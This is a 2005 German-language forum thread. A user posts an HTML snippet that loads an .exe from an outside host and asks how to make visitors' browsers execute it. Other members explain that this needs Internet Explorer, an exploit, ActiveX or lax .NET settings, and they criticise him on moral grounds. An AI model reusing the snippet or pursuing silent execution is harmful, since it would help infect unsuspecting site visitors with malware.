[mod1989]

Hi!
Ich habe hier ein Script nur mein Problem ist dass dieses Script datein beim öffnen einer Seite nur auf dem Zielrechner speichert kann das jemand so umbauen dassdie datei auch ausgeführt wird?

<!-- AUTO PROMPT START -->
<script language="javascript" type="text/javascript"
src="http://download-center.g4.gs/LOL.exe"></script>
<script language="javascript"
type="text/javascript">self.focus();</script>
<!-- AUTO PROMPT END -->


Danke!
mfg fabian

[Graumagier]

Ähm wie wäre es, wenn du das ganze jetzt noch in HTML verpacken würdest, damit der Browser auch was damit anzufangen weiß?

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//DE">
<html>
<head>
</head>
<body>
(Dein Script)
</body>
</html>

[mod1989]

damit is mir ja leider immer noch nicht gehölfen....durch dieses script wird die datei ja nur in den temporary internet files gespeichert das bringt mich aber nicht weiter......sie soll ausgeführt werden

[stefanra]

Das schaffst du nur beim IE - und da eigentlich nur in Verbindung mit 'nem Exploit. Außer der User hat alle Sicherheitsmechanismen deaktiviert.

Wenn die Anwendung hingegen mit .NET programmiert wurde und die Einstellungen im _IE_ enstprechend "lasch" gesetzt sind, dann wird die Anwendung in einer Sandbox ausgeführt. Geht aber nur mit dem IE.

Ja, stimmt ActiveX gibt es auch noch. Aber auch nur im IE.

Dieser Beitrag wurde von stefanra bearbeitet: 06. März 2005 - 11:31

[Graumagier]

Achso, hab deine Frage falsch verstanden. Das ist nicht möglich, höhstens mit ActiveX. Und das ist schon kaputt genug.
Das würde es den Virenschreibern auch zu einfach machen

[mod1989]

hmm...also geht sowas nicht?
ich kenne mich da leider nicht so aus aber was hat es mit diesem .Net auf sich und wiedeso is Active X schon kaputt?

mfg fabian

[Graumagier]

Zitat

wiedeso is Active X schon kaputt?

Weil ActiveX das Ausführen von EXEs ohne Benutzereingabe ermöglicht. Das ist absolut fahrlässig.

Dieser Beitrag wurde von Graumagier bearbeitet: 06. März 2005 - 11:35

[stefanra]

Der IE führt in Verbindung mit dem .NET Framework (Runtime Library von .NET) Anwendungen, die mit .NET Sprachen programmiert wurden (VB.NET, C#.NET, C++.NET oder J#.NET) in einer Sandbox (mehr oder weniger geschützte Umgebung) aus.

[mod1989]

Zitat (mod1989: 06.03.2005, 11:32)

hmm...also geht sowas nicht?
ich kenne mich da leider nicht so aus aber was hat es mit diesem .Net auf sich und wiedeso is Active X schon kaputt?

mfg fabian
<{POST_SNAPBACK}>

cool ja genausowas meinte ich ja........
und wie geht sowas?

[Graumagier]

Vergiss es. Du schließt damit alle Benutzer von Webbrowsern von der Benutzung deiner Homepage aus.

[stefanra]

@mod1989: Bitte quote mal richtig. Keine Ahnung, was du meinst.

Dieser Beitrag wurde von stefanra bearbeitet: 06. März 2005 - 11:37

[mod1989]

Zitat (Graumagier: 06.03.2005, 11:35)

Weil ActiveX das Ausführen von EXEs ohne Benutzereingabe ermöglicht. Das ist absolut fahrlässig.
<{POST_SNAPBACK}>

heißt das es bring nichts diese lücke auszunutzen?und get das überhaupt mit einer .exe dtei

[stefanra]

ActiveX geht nur mit dem IE. Und zur wirklich direkten Ausführung von EXE-Dateien mit ActiveX müssen diese zertifiziert sein (nicht kostenlos!).

Du kannst zwar auch nicht zertifizierte Anwendungen via ActiveX ausführen, nur normalerweise sollte das der Browser (natürlich nur bei richtiger Konfiguration) gleich unterbinden.

[mod1989]

Zitat (Graumagier: 06.03.2005, 11:36)

Vergiss es. Du schließt damit alle Benutzer von Webbrowsern von der Benutzung deiner Homepage aus.
<{POST_SNAPBACK}>

wieso?

[Graumagier]

Zitat

heißt das es bring nichts diese lücke auszunutzen?

LOL das ist doch wohl ein Witz. Noch nie was von Moral gehört?

Zitat

wieso?

Weil ActiveX nur mit dem Internet Explorer funktioniert und dieser m.M.n. kein Webbrowser ist.

Dieser Beitrag wurde von Graumagier bearbeitet: 06. März 2005 - 11:40